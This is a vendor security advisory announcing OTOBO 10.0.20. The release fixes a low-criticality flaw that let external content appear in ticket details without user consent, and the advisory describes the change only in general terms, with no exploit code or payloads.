SECURITY ADVISORY
Injection of JS Code via Customer Management
- PUBLISHED:
- RELEASE TYPE:
- CRITICALITY:
- AFFECTED VERSIONS:
- REFERENCE:
- March 27, 2024
- Security Patch Release
- LOW
- OTOBO 10.0
- —
Description
Problem
- We fixed a vulnerability that allowed external content to be displayed in the ticket detail view without the user’s active consent. OTOBO is now much more stringent overall in its handling of HTML, which is displayed in articles, for example.
Many thanks to Tim Püttmanns (maxence), who brought this vulnerability to our attention.
Potential Consequences
- Display of External Content in Ticket Details Without Active Consent
Measures for Secure Operation
Update to OTOBO 10.0.20
A security patch update is available to fix the vulnerability. Please update your system.
Bug Fixes
- [Security Enhancement] Update to CKEditor Version 4.22.1
- [Security Enhancement] Javascript tags are now filtered out of links
- [Bugfix] Fixed a bug that caused incorrect ticket attributes to be used in ACLs after ticket creation in some cases
- [Bugfix] Fixed an error that prevented standard values from being displayed correctly in dynamic fields on many masks
- and more (Changes)
We’re happy to answer your questions. Contact us.
You’re a support customer and need assistance with the security patch. Please contact us through your access in the support portal.
Downloads
Company
OTOBO | Empower Service Excellence to Make People Smile.
The Source Code Owner and Maintainer of OTOBO.
Software
Service Management Platform
OTOBO Demo
OTOBO Download
OTOBO Documentation
Report a security issues:
security@otobo.org